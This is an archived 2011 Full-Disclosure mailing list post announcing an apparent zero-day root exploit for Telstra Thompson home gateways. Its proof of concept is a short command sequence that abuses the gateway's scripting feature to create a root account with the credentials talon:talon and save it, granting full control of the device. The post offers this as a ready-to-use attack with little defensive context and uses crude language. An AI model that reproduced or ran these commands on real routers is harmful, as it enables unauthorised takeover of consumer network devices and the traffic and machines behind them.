lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <CALCvwp7v2_7mjNb_KTUKknQUtzFVk97bwM=8sh9semTejs+UWw@mail.gmail.com>
Date: Fri, 29 Jul 2011 06:59:34 +1000
From: xD 0x41 <secn3t@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Telstra thompson gateway - root exploit (0day)
Telstra thompson gateway - root exploit
Telstra is an ISP here in Australia, it is also the same isp wich owns the
NBN
Author: Talon ( #haxnet member)
PoC script:
script add name addroot command user add name talon password talon role root
descr ROOT
script run name addroot pars
saveall
This would add a root user as talon:talon ,with complete control over the
gateway and anything running from it.
On behalf of talon, before it gets raped by some idling non @.
cheers
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists